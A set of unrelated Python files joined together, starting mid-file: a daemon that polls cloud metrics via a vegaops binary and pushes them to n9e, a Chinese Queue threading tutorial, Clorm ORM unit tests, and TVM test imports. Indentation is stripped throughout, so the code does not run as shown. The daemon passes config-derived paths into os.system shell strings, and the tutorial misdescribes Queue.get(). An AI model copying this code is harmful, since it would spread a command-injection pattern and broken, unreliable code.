cont = resp.json()
if cont.get('err'):
logger.error(resp.text)
def _build_item(item, key):
if not isinstance(key, (str, unicode)):
return key
if key.startswith('vm.'):
return item.get(key[3:])
return key
def _build_metrics(res, target):
metrics = []
for item in res:
metric = {}
for key in target:
if isinstance(target[key], (dict, list)):
tmp = {}
for kk in target[key]:
val = _build_item(item, target[key][kk])
tmp[kk] = val
metric[key] = json.dumps(tmp)
else:
val = _build_item(item, target[key])
metric[key] = val
metrics.append(metric)
return metrics
def _build_resources(res, target):
resources = []
for item in res:
resource = {}
for key in target:
if isinstance(target[key], (dict, list)):
tmp = {}
for kk in target[key]:
val = _build_item(item, target[key][kk])
tmp[kk] = val
resource[key] = json.dumps(tmp)
else:
val = _build_item(item, target[key])
resource[key] = val
resources.append(resource)
return resources
def _job(n9e, polling):
if polling.get('type', 'resource') == 'resource':
_job_resource(n9e, polling)
elif polling.get('type', 'resource') == 'metric':
_job_metric(n9e, polling)
def _job_metric(n9e, polling):
if not os.path.exists('./tasks'):
os.system('mkdir -p ./tasks')
regions = polling.get('regions', [])
for region in regions:
task = "%s_%s" % (polling.get('task'), region.get('name'))
logger.info("Start to run task: %s" % task)
task_file = './tasks/Task-%s.yaml' % task
output_dir = './tasks/%s' % task
task_d = {
"componentId": task,
"credentials": polling.get('credentials', {}),
"vendor": polling.get('vendor'),
"version": polling.get('version'),
"nodes": polling.get('nodes', [])
}
task_d['credentials']['regionId'] = region.get('name')
try:
fd = open(task_file, "w")
yaml.dump(task_d, fd)
except Exception as e:
logger.error("Failed to create task file %s" % task)
if not os.path.exists(output_dir):
os.system('mkdir %s' % output_dir)
os.system('/opt/vegaops/bin/vegaops %s %s' % (task_file, output_dir))
output = '%s/out.yaml' % output_dir
if not os.path.isfile(output):
logger.error("Could not find output file %s" % output)
return
try:
out = yaml.safe_load(open(output, 'r').read())
except Exception as e:
logger.error("Failed to load output as %s" % e)
return
for node in polling.get('nodes', []):
target = node.get('target')
component = node.get('componentId')
if component not in out:
continue
if not out[component].get('success'):
continue
dt = out[component].get('resultType')
if not dt.startswith('list:'):
continue
metrics = _build_metrics(
out[component].get(dt[5:], []), target)
if not len(metrics):
continue
_push_metrics(n9e, metrics)
def _job_resource(n9e, polling):
if not os.path.exists('./tasks'):
os.system('mkdir -p ./tasks')
regions = polling.get('regions', [])
for region in regions:
task = "%s_%s" % (polling.get('task'), region.get('name'))
logger.info("Start to run task: %s" % task)
task_file = './tasks/Task-%s.yaml' % task
output_dir = './tasks/%s' % task
task_d = {
"componentId": task,
"credentials": polling.get('credentials', {}),
"vendor": polling.get('vendor'),
"version": polling.get('version'),
"nodes": polling.get('nodes', [])
}
task_d['credentials']['regionId'] = region.get('name')
if not os.path.isfile(task_file):
try:
fd = open(task_file, "w")
yaml.dump(task_d, fd)
except Exception as e:
logger.error("Failed to create task file %s" % task)
if not os.path.exists(output_dir):
os.system('mkdir %s' % output_dir)
os.system('/opt/vegaops/bin/vegaops %s %s' % (task_file, output_dir))
output = '%s/out.yaml' % output_dir
if not os.path.isfile(output):
logger.error("Could not find output file %s" % output)
return
try:
out = yaml.safe_load(open(output, 'r').read())
except Exception as e:
logger.error("Failed to load output as %s" % e)
return
for node in polling.get('nodes', []):
target = node.get('target')
component = node.get('componentId')
if component not in out:
continue
if not out[component].get('success'):
continue
dt = out[component].get('resultType')
if not dt.startswith('list:'):
continue
resources = _build_resources(
out[component].get(dt[5:], []), target)
if not len(resources):
continue
_register_resource(n9e, resources)
def _run_threaded(cfg):
job_thread = threading.Thread(
target=cfg['func'], args=(cfg['n9e'], cfg['job']))
job_thread.start()
def _load_jobs(config):
pollings = config.get('pollings', [])
for polling in pollings:
cfg = {
'n9e': config.get('n9e', {}),
'job': polling,
'func': _job
}
schedule.every(
polling.get('interval', 1800)).seconds.do(_run_threaded, cfg)
# _job(cfg['n9e'], cfg['job'])
def cron_job(config):
_load_jobs(config)
while True:
schedule.run_pending()
time.sleep(1)
def once_job(config):
pass
def main():
argv = sys.argv
config_path = "./config.yaml"
_type = 'cron'
if len(argv) <= 1:
logger.info("Use %s as config file" % config_path)
else:
config_path = argv[1]
if not os.path.isfile(config_path):
logger.error("Could not find file %s" % config_path)
os.exit(1)
if len(argv) >= 3:
_type = argv[2]
try:
config = yaml.safe_load(open(config_path, 'r').read())
except Exception as e:
logger.error("Faild to load config file as "
"error %s" % e)
raise e
if _type == 'cron':
cron_job(config)
elif _type == 'once':
once_job(config)
else:
logger.error("Bad job type %s, only support "
"cron, once job" % _type)
os.exit(1)
if __name__ == "__main__":
main()
|
demo6.py
|
"""
【多线程】Queue线程安全队列讲解 2019/11/05 22:17
"""
# TODO: Queue线程安全队列
"""
在线程中,访问一些全局变量,加锁是一个经常的过程。如果你是想把一些数据存储到某个队列中,
那么Python内置了一个线程安全的模块叫做queue模块。Python中的queue模块中提供了同步的、
线程安全的队列类,包括FIFO(先进先出)队列Queue,LIFO(后入先出)队列LifoQueue。
这些队列都实现了锁原语(可以理解为原子操作,即要么不做,要么都做完),能够在多线程中直接使用。
可以使用队列来实现线程间的同步。
相关函数如下:
1.初始化Queue(num):创建一个先进先出number数量的队列。
2.qsize():返回队列的大小。
3.empty():判断队列是否为空。
4.full():判断队列是否满了。
5.get():从队列中取最后一个数据。
6.put():将一个数据放到队列中。
"""
from queue import Queue
import time
import threading
"""
q = Queue(4)
# TODO: 将一个数据放到队列中
q.put(1)
q.put(2)
q.put(3)
q.put(4)
# TODO: 返回队列的大小
print(q.qsize()) # TODO: 4
# TODO: 判断队列是否为空
print(q.empty()) # TODO: False
# TODO: 判断队列是否满了
print(q.full()) # TODO: True
# TODO: 从队列中取最后一个数据
print(q.get()) # TODO: 1
print('=' * 40)
"""
# TODO: 将数据放到队列中
def set_value(q):
index = 0
while True:
q.put(index)
index += 1
time.sleep(3)
# TODO: 从队列中获取最后一个暑假
def get_value(q):
while True:
print('q.qsize(): %d, q.get(): %s' % (q.qsize(), q.get()))
def main():
q = Queue(4)
t1 = threading.Thread(target=set_value, args=(q,))
t2 = threading.Thread(target=get_value, args=(q,))
t1.start()
t2.start()
if __name__ == '__main__':
main()
|
test_orm_symbols_facts.py
|
#------------------------------------------------------------------------------
# Unit tests for Clorm ORM SymbolPredicateUnifer and unify function.
#
# Note: I'm trying to clearly separate tests of the official Clorm API from
# tests of the internal implementation. Tests for the API have names
# "test_api_XXX" while non-API tests are named "test_nonapi_XXX". This is still
# to be completed.
# ------------------------------------------------------------------------------
import unittest,os
import tempfile
from .support import check_errmsg, add_program_string
from clingo import Control, Number, String, Function, SymbolType
from clorm import set_symbol_mode, SymbolMode
# Official Clorm API imports
from clorm.orm import \
BaseField, Raw, RawField, IntegerField, StringField, ConstantField, SimpleField, \
Predicate, ComplexTerm, path, hashable_path, FactBase
# Official Clorm API imports
from clorm import SymbolPredicateUnifier, unify, \
control_add_facts, symbolic_atoms_to_facts, \
parse_fact_string, parse_fact_files, \
UnifierNoMatchError, FactParserError, define_nested_list_field
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
__all__ = [
'UnifyTestCase',
'ClingoControlConvTestCase',
'ParseTestCase'
]
#------------------------------------------------------------------------------
#
#------------------------------------------------------------------------------
def hpaths(paths):
return [ hashable_path(path) for path in paths ]
#------------------------------------------------------------------------------
#
#------------------------------------------------------------------------------
class UnifyTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
#--------------------------------------------------------------------------
# Simple test to make sure that raw terms unify correctly
#--------------------------------------------------------------------------
def test_predicate_instance_raw_term(self):
raw1 = Function("func",[Number(1)])
raw2 = Function("bob",[String("no")])
rf1 = RawField()
rt1 = Function("tmp", [Number(1), raw1])
rt2 = Function("tmp", [Number(1), raw2])
class Tmp(Predicate):
n1 = IntegerField()
r1 = RawField()
self.assertTrue(Tmp._unify(rt1) is not None)
self.assertTrue(Tmp._unify(rt2) is not None)
t1 = Tmp(1,Raw(raw1))
t2 = Tmp(1,Raw(raw2))
self.assertTrue(Tmp._unify(rt2, rt2.arguments, rt2.name) == t2)
self.assertEqual(set([f for f in unify([Tmp], [rt1,rt2])]),set([t1,t2]))
self.assertEqual(t1.r1.symbol, raw1)
self.assertEqual(t2.r1.symbol, raw2)
#--------------------------------------------------------------------------
# Test a generator that takes n-1 Predicate types and a list of raw symbols
# as the last parameter, then tries to unify the raw symbols with the
# predicate types.
# --------------------------------------------------------------------------
def test_unify(self):
raws = [
Function("afact",[Number(1),String("test")]),
Function("afact",[Number(2),Number(3),String("test")]),
Function("afact",[Number(1),Function("fun",[Number(1)])]),
Function("bfact",[Number(3),String("test")])
]
class Afact1(Predicate):
anum=IntegerField()
astr=StringField()
class Meta: name = "afact"
class Afact2(Predicate):
anum1=IntegerField()
anum2=IntegerField()
astr=StringField()
class Meta: name = "afact"
class Afact3(Predicate):
class Fun(ComplexTerm):
fnum=IntegerField()
anum=IntegerField()
afun=Fun.Field()
# afun=ComplexField(Fun)
class Meta: name = "afact"
class Bfact(Predicate):
anum=IntegerField()
astr=StringField()
af1_1=Afact1(anum=1,astr="test")
af2_1=Afact2(anum1=2,anum2=3,astr="test")
af3_1=Afact3(anum=1,afun=Afact3.Fun(fnum=1))
bf_1=Bfact(anum=3,astr="test")
g1=list(unify([Afact1],raws))
g2=list(unify([Afact2],raws))
g3=list(unify([Afact3],raws))
g4=list(unify([Bfact],raws))
g5=list(unify([Afact1,Bfact],raws))
self.assertEqual([af1_1], g1)
self.assertEqual([af2_1], g2)
self.assertEqual([af3_1], g3)
self.assertEqual([bf_1], g4)
self.assertEqual([af1_1,bf_1], g5)
# Test the ordered option that returns a list of facts that preserves
# the order of the original symbols.
g1=unify([Afact1,Afact2,Bfact], raws, ordered=True)
self.assertEqual(g1, [af1_1,af2_1,bf_1])
#--------------------------------------------------------------------------
# Test unification with nullary predicates
# --------------------------------------------------------------------------
def test_unify_nullary(self):
raws = [
Function("afact",[Number(1),String("test")]),
Function("nullary1",[]),
Function("nullary2",[]),
Function("afact",[Number(2),String("test")]),
]
class Afact(Predicate):
anum=IntegerField()
astr=StringField()
class Meta: name = "afact"
class Nullary1(Predicate):
class Meta: name = "nullary1"
class Nullary2(Predicate):
class Meta: name = "nullary2"
af_1=Afact(anum=1,astr="test")
af_2=Afact(anum=2,astr="test")
u_1=Nullary1()
u_2=Nullary2()
self.assertEqual(list(unify([Nullary1],raws)),[u_1])
self.assertEqual(list(unify([Nullary2],raws)),[u_2])
self.assertEqual(set(unify([Afact,Nullary1,Nullary2],raws)),
set([af_1,af_2,u_1,u_2]))
#--------------------------------------------------------------------------
# Test unifying between predicates which have the same name-arity
# signature. There was a bug in the unify() function where only of the
# unifying classes was ignored leading to failed unification.
# --------------------------------------------------------------------------
def test_unify_same_sig(self):
class ATuple(ComplexTerm):
aconst=ConstantField()
bint = IntegerField()
class Meta: is_tuple = True
class Fact1(Predicate):
aint = IntegerField()
aconst = ConstantField()
class Meta: name = "fact"
class Fact2(Predicate):
aint = IntegerField()
atuple = ATuple.Field()
class Meta: name = "fact"
r1 = Function("fact",[Number(1), Function("bob",[])])
r2 = Function("fact",[Number(1), Function("", [Function("bob",[]),Number(1)])])
# r1 only unifies with Fact1 and r2 only unifies with Fact2
f1 = Fact1._unify(r1)
self.assertEqual(f1.raw, r1)
self.assertEqual(Fact1._unify(r2), None)
f2 = Fact2._unify(r2)
self.assertEqual(f2.raw, r2)
self.assertEqual(Fact2._unify(r1), None)
# The unify() function should correctly unify both facts
res = unify([Fact1,Fact2],[r1,r2])
self.assertEqual(len(res), 2)
#--------------------------------------------------------------------------
# Test unifying between predicates which have the same name-arity
# signature to make sure the order of the predicate classes correctly
# corresponds to the order in which the facts are unified.
# --------------------------------------------------------------------------
def test_unify_same_sig2(self):
class Fact1(Predicate):
aint = IntegerField()
aconst = ConstantField()
class Meta: name = "fact"
class Fact2(Predicate):
aint = IntegerField()
araw = RawField()
class Meta: name = "fact"
r1 = Function("fact",[Number(1), Function("bob",[])])
r2 = Function("fact",[Number(1), Function("", [Function("bob",[]),Number(1)])])
# r1 only unifies with Fact1 but both r1 and r2 unify with Fact2
f1 = Fact1._unify(r1)
self.assertEqual(f1.raw, r1)
self.assertEqual(Fact1._unify(r2), None)
f1_alt = Fact2._unify(r1)
self.assertEqual(f1_alt.raw, r1)
f2 = Fact2._unify(r2)
self.assertEqual(f2.raw, r2)
# unify() unifies r1 with Fact1 (f1) and r2 with Fact2 (f2)
res = unify([Fact1,Fact2],[r1,r2])
self.assertEqual(len(res), 2)
self.assertTrue(f1 in res)
self.assertTrue(f2 in res)
# unify() unifies r1 and r2 with Fact2 (f1_alt and f2)
res = unify([Fact2,Fact1],[r1,r2])
self.assertEqual(len(res), 2)
self.assertTrue(f1_alt in res)
self.assertTrue(f2 in res)
#--------------------------------------------------------------------------
# Test unifying with negative facts
#--------------------------------------------------------------------------
def test_unify_signed_literals(self):
class F1(Predicate):
a = IntegerField
class Meta:
name = "f"
sign = True
class F2(Predicate):
a = IntegerField
class Meta:
name = "f"
sign = False
pos_raw1 = Function("f",[Number(1)])
pos_raw2 = Function("f",[Number(2)])
neg_raw1 = Function("f",[Number(1)],False)
neg_raw2 = Function("f",[Number(2)],False)
pos1 = F1(a=1)
pos2 = F1(a=2)
neg1 = F2(a=1,sign=False)
neg2 = F2(a=2,sign=False)
# unify with all raw
fb = unify([F1,F2], [ pos_raw1, pos_raw2, neg_raw1, neg_raw2])
self.assertEqual(len(fb), 4)
self.assertEqual(set(fb.query(F1).all()), set([pos1,pos2]))
self.assertEqual(set(fb.query(F2).all()), set([neg1,neg2]))
fb = unify([F1], [ pos_raw1, pos_raw2, neg_raw1, neg_raw2])
self.assertEqual(len(fb), 2)
self.assertEqual(fb.query(F1).count(), 2)
fb = unify([F2], [ pos_raw1, pos_raw2, neg_raw1, neg_raw2])
self.assertEqual(len(fb), 2)
self.assertEqual(fb.query(F2).count(), 2)
with self.assertRaises(ValueError) as ctx:
bad1 = F1(a=1,sign=False)
#--------------------------------------------------------------------------
# Test unify catching exceptions. When failing to convert a symbol to a
# python object we need to catch some exceptions. But we shouldn't catch all
# exceptions, otherwise genuine errors (like missing modules) will not be
# caught. Thanks to Susana Hahn for finding this problem.
# --------------------------------------------------------------------------
def test_unify_catch_exceptions(self):
# Define a class that converts strings but makes bad exceptions for any
# other input
class TmpField(BaseField):
def cltopy(raw):
if raw.type == SymbolType.String:
return raw.string
return blah.blah.error1(raw)
def pytocl(v):
if isinstance(v,str): return String(v)
import blah
return blah.error2(v)
# This is good
self.assertEqual(TmpField.cltopy(String("blah")), "blah")
self.assertEqual(TmpField.pytocl("blah"), String("blah"))
# Some things that should throw an exception
with self.assertRaises(AttributeError) as ctx:
r=TmpField.cltopy(1)
check_errmsg("'int' object has no attribute 'type'",ctx)
with self.assertRaises(NameError) as ctx:
r=TmpField.cltopy(Number(1))
check_errmsg("name 'blah' is not defined",ctx)
with self.assertRaises(ModuleNotFoundError) as ctx:
r=TmpField.pytocl(1)
check_errmsg("No module named 'blah'",ctx)
class F(Predicate):
v=TmpField
# Ok
raw=Function("f",[String("astring")])
unify([F],[raw])
# Bad
with self.assertRaises(NameError) as ctx:
raw=Function("f",[Number(1)])
unify([F],[raw])
check_errmsg("name 'blah' is not defined",ctx)
#--------------------------------------------------------------------------
# Test the factbasehelper with double decorators
#--------------------------------------------------------------------------
def test_symbolpredicateunifier(self):
# Using the SymbolPredicateUnifier as a decorator
spu1 = SymbolPredicateUnifier()
spu2 = SymbolPredicateUnifier()
spu3 = SymbolPredicateUnifier(suppress_auto_index=True)
# decorator both
@spu3.register
@spu2.register
@spu1.register
class Afact(Predicate):
num1=IntegerField(index=True)
num2=IntegerField()
str1=StringField()
# decorator without argument
@spu1.register
class Bfact(Predicate):
num1=IntegerField(index=True)
str1=StringField()
self.assertEqual(spu1.predicates, (Afact,Bfact))
self.assertEqual(spu2.predicates, (Afact,))
self.assertEqual(spu3.predicates, (Afact,))
self.assertEqual(set(hpaths(spu1.indexes)),
set(hpaths([Afact.num1,Bfact.num1])))
self.assertEqual(hpaths(spu2.indexes), hpaths([Afact.num1]))
self.assertEqual(spu3.indexes, ())
#--------------------------------------------------------------------------
# Test the symbolpredicateunifier when there are subfields defined
#--------------------------------------------------------------------------
def test_symbolpredicateunifier_with_subfields(self):
spu = SymbolPredicateUnifier()
class CT(ComplexTerm):
a = IntegerField
b = StringField(index=True)
c = (IntegerField(index=True),ConstantField)
@spu.register
class P(Predicate):
d = CT.Field(index=True)
e = CT.Field()
expected=set([hashable_path(P.d),
hashable_path(P.d.b), hashable_path(P.d.c.arg1),
hashable_path(P.e.b), hashable_path(P.e.c.arg1)])
self.assertEqual(spu.predicates, (P,))
self.assertEqual(set([hashable_path(p) for p in spu.indexes]), set(expected))
ct_func=Function("ct",[Number(1),String("aaa"),
Function("",[Number(1),Function("const",[])])])
p1=Function("p",[ct_func,ct_func])
fb=spu.unify(symbols=[p1],raise_on_empty=True)
self.assertEqual(len(fb),1)
self.assertEqual(set([hashable_path(p) for p in fb.indexes]), expected)
#--------------------------------------------------------------------------
# Test that subclass factbase works and we can specify indexes
#--------------------------------------------------------------------------
def test_symbolpredicateunifier_symbols(self):
class Afact(Predicate):
num1=IntegerField()
num2=IntegerField()
str1=StringField()
class Bfact(Predicate):
num1=IntegerField()
str1=StringField()
class Cfact(Predicate):
num1=IntegerField()
af1 = Afact(1,10,"bbb")
af2 = Afact(2,20,"aaa")
af3 = Afact(3,20,"aaa")
bf1 = Bfact(1,"aaa")
bf2 = Bfact(2,"bbb")
cf1 = Cfact(1)
raws = [
Function("afact",[Number(1), Number(10), String("bbb")]),
Function("afact",[Number(2), Number(20), String("aaa")]),
Function("afact",[Number(3), Number(20), String("aaa")]),
Function("bfact",[Number(1),String("aaa")]),
Function("bfact",[Number(2),String("bbb")]),
Function("cfact",[Number(1)])
]
spu = SymbolPredicateUnifier(predicates=[Afact,Bfact,Cfact])
# Test the different ways that facts can be added
fb = spu.unify(symbols=raws)
self.assertFalse(fb._delayed_init)
self.assertEqual(set(fb.predicates), set([Afact,Bfact,Cfact]))
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
fb = spu.unify(symbols=raws, delayed_init=True)
self.assertTrue(fb._delayed_init)
self.assertEqual(set(fb.predicates), set([Afact,Bfact,Cfact]))
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
fb = FactBase()
fb.add([af1,af2,af3])
#### self.assertEqual(fb.add([af1,af2,af3]),3)
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
fb = FactBase()
fb.add(af1)
fb.add(af2)
fb.add(af3)
#### self.assertEqual(fb.add(af1),1)
#### self.assertEqual(fb.add(af2),1)
#### self.assertEqual(fb.add(af3),1)
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
# Test that adding symbols can handle symbols that don't unify
fb = spu.unify(symbols=raws)
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
return
# Test the specification of indexes
class MyFactBase3(FactBase):
predicates = [Afact, Bfact]
spu = SymbolPredicateUnifier(predicates=[Afact,Bfact,Cfact],
indexes=[Afact.num1, Bfact.num1])
fb = spu.unify(symbols=raws)
s = fb.query(Afact).where(Afact.num1 == 1)
self.assertEqual(s.get_unique(), af1)
s = fb.query(Bfact).where(Bfact.num1 == 1)
self.assertEqual(s.get_unique(), bf1)
#------------------------------------------------------------------------------
# Functions that facilitate interactions with clingo.Control. Note: uses
# multiprocessing library to make sure that we avoid the solver not being able
# to release symbols between runs.
# ------------------------------------------------------------------------------
import multiprocessing as mp
class XP(Predicate):
x=IntegerField
class XQ(Predicate):
x=IntegerField
class XQ2(Predicate):
x=StringField
class Meta: name="xq"
def symbolic_atoms_to_facts_test1(q,facts_only):
prgstr="""xq(1). xq("a"). 1 { xp(1);xp(2) }2."""
ctrl=Control()
add_program_string(ctrl,prgstr)
ctrl.ground([("base",[])])
fb=symbolic_atoms_to_facts(ctrl.symbolic_atoms,[XP,XQ,XQ2],
facts_only=facts_only)
q.put(fb)
class ClingoControlConvTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
#--------------------------------------------------------------------------
# Basic test of adding facts into a control object
#--------------------------------------------------------------------------
def test_control_add_facts(self):
class F(Predicate):
anum = IntegerField
f1 = F(1) ; f2 = F(2)
ctrl = Control()
control_add_facts(ctrl,[f1,f2])
ctrl.ground([("base",[])])
model = None
with ctrl.solve(yield_=True) as sh:
for m in sh:
model=str(m)
self.assertEqual(model, "{} {}".format(f1,f2))
#--------------------------------------------------------------------------
# Test converting Control.symbolic_atoms to a factbase
#--------------------------------------------------------------------------
def test_symbolic_atoms_to_facts(self):
fb1_expected=FactBase([XP(1),XP(2),XQ(1),XQ2("a")])
fb2_expected=FactBase([XQ(1),XQ2("a")])
# Return all ground atoms
q=mp.Queue()
p=mp.Process(target=symbolic_atoms_to_facts_test1,args=(q,False))
p.start()
fb1_result=q.get()
p.join()
self.assertEqual(fb1_result,fb1_expected)
# Return only fact atoms
q=mp.Queue()
p=mp.Process(target=symbolic_atoms_to_facts_test1,args=(q,True))
p.start()
fb2_result=q.get()
p.join()
self.assertEqual(fb2_result,fb2_expected)
#------------------------------------------------------------------------------
# Test of functions involve with parsing asp ground facts to clorm facts
#------------------------------------------------------------------------------
class ParseTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
#--------------------------------------------------------------------------
#
#--------------------------------------------------------------------------
def test_parse_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
y=StringField
class Q(Predicate):
'''A Q predicate'''
x=ConstantField
y=P.Field
asp1="""p(1,"home\\""). -p(-2,"blah").\n"""
asp2=asp1 + """q(X,Y) :- p(X,Y)."""
fb_p=FactBase([P(1,"home\""),P(-2,"blah",sign=False)])
fb_in=FactBase([P(1,"home\""),
Q("abc",P(3,"H ome")),
Q("z",P(-1,"One more string")),
P(-2,"blah",sign=False)])
# Match a basic string with a rule
fb_out = parse_fact_string(asp2,unifier=[P,Q])
self.assertEqual(fb_p,fb_out)
# All inputs and outputs match
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Match only the p/2 facts
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P])
self.assertEqual(fb_p,fb_out)
# Match with comments
fb_out = parse_fact_string(fb_in.asp_str(commented=True),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Error on ununified facts
with self.assertRaises(UnifierNoMatchError) as ctx:
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P],
raise_nomatch=True)
check_errmsg("Cannot unify symbol 'q(abc",ctx)
# Error on nonfact
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp2,unifier=[P],
raise_nonfact=True)
assert ctx.exception.line == 2
# Try the fact files parser
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out=parse_fact_files([fname],unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Option where a factbase is given
fb_out = FactBase()
parse_fact_string(fb_in.asp_str(commented=True),
unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
# Fact file parser where factbase is given
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out = FactBase()
parse_fact_files([fname],unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
#--------------------------------------------------------------------------
#
#--------------------------------------------------------------------------
def test_lark_parse_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
y=StringField
class Q(Predicate):
'''A Q predicate'''
x=ConstantField
y=P.Field
asp1="""p(1,"home\\""). -p(-2,"blah").\n"""
asp2=asp1 + """q(X,Y) :- p(X,Y)."""
fb_p=FactBase([P(1,"home\""),P(-2,"blah",sign=False)])
fb_in=FactBase([P(1,"home\""),
Q("abc",P(3,"H ome")),
Q("z",P(-1,"One more string")),
P(-2,"blah",sign=False)])
# Match a basic string with a rule
fb_out = parse_fact_string(asp2,unifier=[P,Q])
self.assertEqual(fb_p,fb_out)
# All inputs and outputs match
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Match only the p/2 facts
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P])
self.assertEqual(fb_p,fb_out)
# Match with comments
fb_out = parse_fact_string(fb_in.asp_str(commented=True),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Error on ununified facts
with self.assertRaises(UnifierNoMatchError) as ctx:
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P],
raise_nomatch=True)
check_errmsg("Cannot unify symbol 'q(abc",ctx)
# Error on nonfact
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp2,unifier=[P],
raise_nonfact=True)
assert ctx.exception.line == 2
# Try the fact files parser
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out=parse_fact_files([fname],unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Option where a factbase is given
fb_out = FactBase()
parse_fact_string(fb_in.asp_str(commented=True),
unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
# Fact file parser where factbase is given
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out = FactBase()
parse_fact_files([fname],unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
#--------------------------------------------------------------------------
# Test parsing some nested facts
#--------------------------------------------------------------------------
def test_parse_nested_facts(self):
class P(Predicate):
x=IntegerField
y=define_nested_list_field(ConstantField)
fb_in = FactBase([P(x=1,y=tuple(["a","b","c"]))])
aspstr = fb_in.asp_str()
fb_out = parse_fact_string(aspstr,unifier=[P],raise_nomatch=True)
self.assertEqual(fb_in,fb_out)
#--------------------------------------------------------------------------
# Test lark parsing some nested facts
#--------------------------------------------------------------------------
def test_lark_parse_nested_facts(self):
class P(Predicate):
x=IntegerField
y=define_nested_list_field(ConstantField)
set_symbol_mode(SymbolMode.NOCLINGO)
fb_in = FactBase([P(x=1,y=tuple(["a","b","c"]))])
aspstr = fb_in.asp_str()
fb_out = parse_fact_string(aspstr,unifier=[P],
raise_nomatch=True, raise_nonfact=True)
self.assertEqual(fb_in,fb_out)
set_symbol_mode(SymbolMode.CLINGO)
#--------------------------------------------------------------------------
# Parsing non simple facts to raise FactParserError. Non simple facts include:
# - a term with @-function call (this needs a Control object for grounding)
# - a disjunctive fact
# - a choice rule
# --------------------------------------------------------------------------
def test_parse_non_simple_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
# Using an external function
asp="""p(@func(1))."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A choice rule
asp="""{ p(2); p(3) }."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A disjunctive fact
asp="""p(2); p(3)."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A theory atom - let the general non-fact literal catch this
asp="""&diff{p(2)}."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
#--------------------------------------------------------------------------
# Parsing non simple facts to raise FactParserError with NOCLINGO mode (so
# using the lark parser).
# --------------------------------------------------------------------------
def test_lark_parse_non_simple_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
set_symbol_mode(SymbolMode.NOCLINGO)
# Using an external function
asp="""p(@func(1))."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A choice rule
asp="""{ p(2); p(3) }."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A disjunctive fact
asp="""p(2); p(3)."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A theory atom - let the general non-fact literal catch this
asp="""&diff{p(2)}."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
set_symbol_mode(SymbolMode.CLINGO)
#------------------------------------------------------------------------------
# main
#------------------------------------------------------------------------------
if __name__ == "__main__":
raise RuntimeError('Cannot run modules')
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import logging
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
